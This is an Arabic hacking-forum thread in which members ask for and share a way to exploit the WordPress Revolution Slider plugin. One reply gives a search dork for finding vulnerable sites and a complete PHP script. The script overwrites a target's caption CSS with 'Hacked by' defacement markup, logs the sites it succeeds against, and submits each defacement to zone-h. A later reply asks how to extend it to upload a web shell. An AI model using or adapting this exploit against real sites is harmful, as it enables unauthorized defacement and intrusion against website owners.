قديم 03-24-2015, 11:10 AM   المشاركة رقم: 1
الكاتب
s3c0xr
.:: عضو جديد ::.
المعلومات  
التسجيل: Mar 2015
العضوية: 204929
المشاركات: 3
بمعدل : 0.00 يوميا
الإتصال s3c0xr غير متواجد حالياً


المنتدى  
افتراضي استفسار عن ثغرة ورد بريس .؟

السلام عليكم ورحمة الله وبركاته ..


.


كلنا شايفين الزون اتش مولع بثغرة الورد بريس !

الثغره هي :

wp-admin/admin-ajax.php?action=revslider_ajax_action&client_actio n=get_captions_css

ياليت الي معه الطريقه يفدينا












عرض البوم صور s3c0xr   رد مع اقتباس

قديم 03-24-2015, 07:39 PM   المشاركة رقم: 2
الكاتب
Dr.KlvZ
.:: عضو نشيط ::.
 
الصورة الرمزية Dr.KlvZ
المعلومات  
التسجيل: May 2013
العضوية: 179833
المشاركات: 454
بمعدل : 0.23 يوميا
الإتصال Dr.KlvZ غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

تفضل اخوي
الدورك

كود PHP:
 inurl:/revslider/rs-plugin/videojs
السكربت يشتغل عن طريق cmd
بالامر php script.php
كود PHP:
<?php
    
/*
    
    
    Cod3r By Dr.*** 
    G2: Brg alshmil - xman_3r3r - Error 7rb - Hannibal Ksa - team system dz - r3m0t3Nu11 - Dr.DeviL - Severus - r0x - all Group Omarxarmy - all Sunnah
    Thanks to ***site : alm3refh.com - v4-team.com - hack-ar.com - zero-way.net
    # برئ براه كامله من ثغره بستخدامه بشي لا يرضى الله و ضر اخوانك المسلمين 
    
    
    */
    
echo "\n+-------------------------------------------+\n";
    echo 
"|          Cod3r By Dr.***                     |\n";
    echo 
"| This tool made-to fight the enemies of Islam |\n";
    echo 
"+-------------------------------------------+\n";
    
$agent "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";
    $******
_file_path "/";
    
$site    rtrim($site,'/');
    echo 
"\n| Enter Target # ";
    
$site=trim(fgets(STDIN));
    echo 
"\n| Enter Your **** # ";
    $****=
trim(fgets(STDIN));
    
$url"http://zone-h.org/notify/single";
    
$hackmode="1";
    
$reson="1";
    
$path ="/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
    echo 
"\n| Enter Your **** account zone-h # ";
    
$hacker=trim(fgets(STDIN));

    
$ch curl_init();
    
curl_setopt($chCURLOPT_URL"http://".$site."/wp-admin/admin-ajax.php");
    
curl_setopt($chCURLOPT_USERAGENT$agent);
    
curl_setopt($chCURLOPT_POST1);
    
curl_setopt($chCURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action""client_action" => "update_captions_css""data" => "<**** style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by $****<p style='color: transparent'>"));
    
curl_setopt($chCURLOPT_RETURNTRANSFER1);
    
curl_setopt($chCURLOPT_FOLLOW********, 1);
    
curl_setopt($chCURLOPT_******FILE, $******_file_path);
    
curl_setopt($chCURLOPT_******JAR, $******_file_path);
    
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
    
curl_setopt($chCURLOPT_SSL_VERIFYHOST0);
    
$result curl_exec($ch);
        if (
eregi('true'$result)) {
        echo 
"| wait ......\n";
        echo 
"| Success Exploit\n";
        echo 
"| Link Index: http://".$site "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
        
$fo fopen("finish.txt","a+");
        
$r fwrite($fo,"http://".$site."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
        
fclose($fo);}
        else {
        echo 
"| http://".$site " : Not Revslider \n\n";
    }
    echo 
"\n\n";
    
$k curl_init();
    
curl_setopt($kCURLOPT_URL$url);
    
curl_setopt($k,CURLOPT_POST,1);
    
curl_setopt($kCURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1="."http://".$site."".$path."&hackmode=".$hackmode."&reason=".$reson);
    
curl_setopt($k,CURLOPT_FOLLOW********, true);
    
curl_setopt($kCURLOPT_RETURNTRANSFERtrue);
    
$kubra curl_exec($k);
    
curl_close($k);
     if (
eregi('OK'$kubra)) {
     echo 
"| Send Site To Zone-H\n";
        echo 
"| Site : ".$site." Defaced !";
    } else {
     echo 
"| Send Site To Zone-H\n";
        echo 
"| http://".$site " : Not Defaced \n\n";
    }
    
curl_close($ch);



    
?>
المصدر [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]












توقيع : Dr.KlvZ

من يقتلك ليس من يطلق عليك رصاصة , بل من يقتل احلامك!

KsA

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]

عرض البوم صور Dr.KlvZ   رد مع اقتباس

قديم 03-28-2015, 07:48 PM   المشاركة رقم: 3
الكاتب
مستر قلق
.:: { اسد صنعاء } ::.
المعلومات  
التسجيل: Feb 2009
العضوية: 10021
المشاركات: 9,407
بمعدل : 2.66 يوميا
الإتصال مستر قلق غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

احسنت Dr.KlvZ

ونشكر دكتور ويب ثامر الحربي













التعديل الأخير تم بواسطة مستر قلق ; 03-31-2015 الساعة 12:12 AM
عرض البوم صور مستر قلق   رد مع اقتباس

قديم 03-28-2015, 11:47 PM   المشاركة رقم: 4
الكاتب
Dr.KlvZ
.:: عضو نشيط ::.
 
الصورة الرمزية Dr.KlvZ
المعلومات  
التسجيل: May 2013
العضوية: 179833
المشاركات: 454
بمعدل : 0.23 يوميا
الإتصال Dr.KlvZ غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

الله يسلمك ي ابن اليمن












توقيع : Dr.KlvZ

من يقتلك ليس من يطلق عليك رصاصة , بل من يقتل احلامك!

KsA

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]

عرض البوم صور Dr.KlvZ   رد مع اقتباس

قديم 04-13-2015, 04:32 PM   المشاركة رقم: 5
الكاتب
TacticiaN
.:: عضو ::.
 
الصورة الرمزية TacticiaN
المعلومات  
التسجيل: Feb 2010
العضوية: 49190
المشاركات: 45
بمعدل : 0.01 يوميا
الإتصال TacticiaN غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

المشكله انها لا ترفع شيل
مجرد اعلان اختراق
هل يمكن تطويرها لرفع شيل ؟؟












توقيع : TacticiaN




[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
TacticiaN



عرض البوم صور TacticiaN   رد مع اقتباس

قديم 04-13-2015, 11:58 PM   المشاركة رقم: 6
الكاتب
X_MAN 3R3R
.:: عضو نشيط ::.
 
الصورة الرمزية X_MAN 3R3R
المعلومات  
التسجيل: May 2012
العضوية: 137980
المشاركات: 253
بمعدل : 0.11 يوميا
الإتصال X_MAN 3R3R غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مشكور اخوي Dr.KlvZ وتسلم الايادي ثامر ننتظر جديدك












عرض البوم صور X_MAN 3R3R   رد مع اقتباس

إضافة رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
استفسار تنقل على السرفر من ورد بريس reko7 [ مشاكل وحلول اختراق المواقع ] 1 05-29-2013 04:30 AM
استفسار عن ثغره بالورد بريس معقوولهه [ مشاكل وحلول اختراق المواقع ] 4 04-12-2013 12:46 PM
[ استفسار ] طلب مساعده فى استغلال ثغرة فى ورد بريس mr-boody [ مشاكل وحلول اختراق المواقع ] 1 02-04-2013 02:57 PM
ثغرة ورد بريس sql intel [ الـثـغـرات ] 6 12-14-2012 12:47 AM
استفسار .. طريقة رفع الشيل .. في الورد بريس GIUC [ مشاكل وحلول اختراق المواقع ] 15 06-03-2012 03:54 PM


الساعة الآن 08:56 AM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.